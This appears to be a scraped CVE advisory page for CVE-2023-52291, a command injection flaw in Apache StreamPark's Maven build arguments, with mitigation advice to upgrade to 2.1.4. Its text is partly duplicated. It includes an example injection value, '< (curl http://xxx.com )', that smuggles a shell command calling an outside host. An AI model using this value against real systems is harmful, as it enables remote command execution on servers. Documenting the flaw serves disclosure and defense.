CVE-2023-52291 Information

Description

In streampark the project module integrates Maven’s compilation capabilities. The input parameter validation is not strict allowing attackers to insert commands for remote command execution The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally only users of that system have the authorization to log in and users would not manually input a dangerous operation command. Therefore the risk level of this vulnerability is very low.

Background:

In the \Project\ module the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection

Mitigation:

all users should upgrade to 2.1.4  The <\ operator will blocked?

Reference

https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf http://www.openwall.com/lists/oss-security/2024/07/17/1 In streampark the project module integrates Maven’s compilation capabilities. The input parameter validation is not strict allowing attackers to insert commands for remote command execution The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally only users of that system have the authorization to log in and users would not manually input a dangerous operation command. Therefore the risk level of this vulnerability is very low.

Background:

In the \Project
module the maven build args  “<” operator causes command injection. e.g : “< (curl  http://xxx.com )” will be executed as a command injection

Mitigation:

all users should upgrade to 2.1.4  The <
operator will blocked?

Share on: